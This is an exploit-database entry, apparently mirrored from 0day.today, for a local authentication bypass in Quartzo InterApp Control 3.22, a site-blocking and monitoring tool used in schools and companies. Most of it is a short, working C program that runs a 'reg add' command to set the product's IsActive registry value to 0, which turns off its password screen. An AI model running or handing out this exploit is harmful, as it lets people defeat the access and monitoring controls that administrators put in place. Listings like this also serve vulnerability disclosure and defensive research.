Lucene search
K

Quartzo InterApp Control 3.22 Authentication Bypass

🗓️ 08 Feb 2012 00:00:00Reported by Rodrigo SantosType 
zdt
 zdt
🔗 0day.today👁 34 Views

Quartzo InterApp Control 3.22 Authentication Bypass vulnerability in Windows

Code
/*
*  Title: Quartzo InterApp Control 3.22 Authentication Bypass
*  Date: 02-07-12
*  Category: Local
*  Vendor website: http://www.quartzo.com.br/
*  Author: Rodrigo Santos
*  Contact: [email protected]
*  Tested on: Quartzo InterApp Control (free) version 3.22 on Windows 7 Enterprise 64-bit
*
*  Product detail:
*  Quartzo InterApp Control is an application used to block websites, applications, and monitor computers in many schools and companies.
*  There is also a good number of home users.
*
*  Vulnerability:
*  By editing the Windows registry, an attacker can bypass the application's screen that asks for the password.
*/

#include <stdio.h>

int main() {
	printf("Deactivating Quartzo InterApp Control...\n");
	system("reg add HKEY_CURRENT_USER\\Software\\qubnfe /v IsActive /t REG_SZ /d 0 /f");
	return 0;
}



#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation